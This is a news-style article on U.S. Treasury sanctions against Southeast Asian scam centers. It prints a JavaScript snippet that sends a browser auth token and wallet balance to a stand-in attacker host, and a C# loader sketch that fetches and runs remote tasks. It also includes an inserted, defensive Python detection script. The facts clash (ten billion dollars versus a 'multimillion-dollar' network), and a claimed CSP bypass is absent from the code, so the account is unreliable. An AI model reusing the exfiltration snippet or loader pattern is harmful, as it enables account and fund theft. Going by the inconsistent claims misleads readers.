
Cybersecurity: U.S. Treasury Sanctions on Cyber Scam Centers

The U.S. Department of the Treasury has initiated sanctions against a network of cyber scam centers in Southeast Asia, which have collectively defrauded American victims of over ten billion dollars in 2024.

Operational Details

These operations, posing as legitimate virtual currency investment platforms, utilized advanced social engineering techniques to deceive users into transferring funds. The scams extended from Myanmar to Cambodia, involving forced labor and coercive practices.

The scams, which became prevalent during the early months of the pandemic, used romance fraud, mobile messaging exploits, and fraudulent blockchain tutorials to present an illusion of credible investment returns. The sites featured real-time price feeds, SSL certificates, and user interfaces similar to legitimate exchanges.

Technical Exploits

Backend malware kits were installed on operators’ workstations, enabling automated spoofing of payment notifications and social account takeovers. The Treasury identified code modules that intercepted SMS one-time-passcodes and injected synthetic transaction confirmations, effectively bypassing two-factor authentication.

Operators, some under debt bondage, were trained to engage victims using scripts built on open-source intelligence about the target. Victims were tricked into running benign-looking JavaScript snippets that handed scammers the authentication token kept in browser storage (the snippet below reads it from localStorage). An example of this script is shown below:

(async () => {
  const token = localStorage.getItem('auth_token');
  await fetch('https://malicious.scam/api/steal', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ token, balance: window.wallet.balance })
  });
})();

This snippet abused browser extensions to bypass Content Security Policy (CSP) restrictions, allowing script to be injected from a remote origin.

Persistence Mechanisms

At the core of the Burma-based hub, known as Yatai New City, operators implemented custom mechanisms to maintain control over compromised accounts. A C# loader, termed “BeaconYatai,” was embedded in video conferencing tools to establish command-and-control channels. It registered as a Windows service, “SvcUpdate,” and polled the Telegram API for encrypted tasks, decrypted with a hardcoded RSA key:

// Hard-coded private key embedded in the loader (truncated in the source)
RSAParameters rsaKey = LoadKey("-----BEGIN RSA PRIVATE KEY-----...");
// Encrypted task fetched from the Telegram API and decrypted locally
byte[] payload = FetchFromTelegram().Decrypt(rsaKey);
// Decrypted task is executed on the compromised host
ExecutePayload(payload);
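The persistence described above leaves two host-level traces a defender can correlate: a service installation event and a service binary that talks to the Telegram API. The following detection, added here as an example and not code from the article or the Treasury, correlates constructed System log 7045 (service installed) and Sysmon Event ID 3 (network connection) records; the log layout, file paths and the allow list of legitimate Telegram clients are assumptions.

```python
import re

# Constructed sample events (not from the article), flattened to key=value
# text the way a SIEM export might render them. Paths are hypothetical.
SAMPLE_EVENTS = [
    "EventID=7045 ServiceName=SvcUpdate ImagePath=C:\\ProgramData\\Zoom\\bin\\zupd.exe StartType=auto",
    "EventID=7045 ServiceName=wuauserv ImagePath=C:\\Windows\\System32\\svchost.exe StartType=auto",
    "EventID=3 Image=C:\\ProgramData\\Zoom\\bin\\zupd.exe DestinationHostname=api.telegram.org DestinationPort=443",
    "EventID=3 Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe DestinationHostname=api.telegram.org DestinationPort=443",
    "EventID=3 Image=C:\\Windows\\System32\\svchost.exe DestinationHostname=update.microsoft.com DestinationPort=443",
]

# Binaries that legitimately reach the Telegram API from a workstation (assumed allow list).
ALLOWED_TELEGRAM_CLIENTS = {"telegram.exe", "firefox.exe", "chrome.exe"}


def parse_event(line):
    """Split a flattened 'key=value key=value' record into a dict.
    Splitting only before 'key=' keeps spaces inside paths intact."""
    fields = {}
    for token in re.split(r"\s+(?=\w+=)", line.strip()):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def find_telegram_polling_services(lines):
    """Return names of services whose binary was installed as a service (7045)
    and later observed connecting to telegram.org (Sysmon 3), excluding
    allow-listed clients. Correlation is by image path, case-insensitively."""
    services_by_image = {}
    telegram_talkers = set()
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") == "7045":
            services_by_image[ev["ImagePath"].lower()] = ev["ServiceName"]
        elif ev.get("EventID") == "3" and ev.get("DestinationHostname", "").endswith("telegram.org"):
            image = ev["Image"].lower()
            if image.rsplit("\\", 1)[-1] not in ALLOWED_TELEGRAM_CLIENTS:
                telegram_talkers.add(image)
    return sorted(services_by_image[img] for img in telegram_talkers if img in services_by_image)


if __name__ == "__main__":
    for name in find_telegram_polling_services(SAMPLE_EVENTS):
        print(f"suspicious service polling Telegram: {name}")  # prints SvcUpdate
```

A browser reaching api.telegram.org is normal, which is why the correlation with a freshly installed service, rather than the destination alone, carries the signal.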

These operations, combining social coercion, scripting exploits, and malware persistence, achieved high operational uptime. The Treasury’s sanctions are a significant measure toward dismantling this multimillion-dollar criminal network.
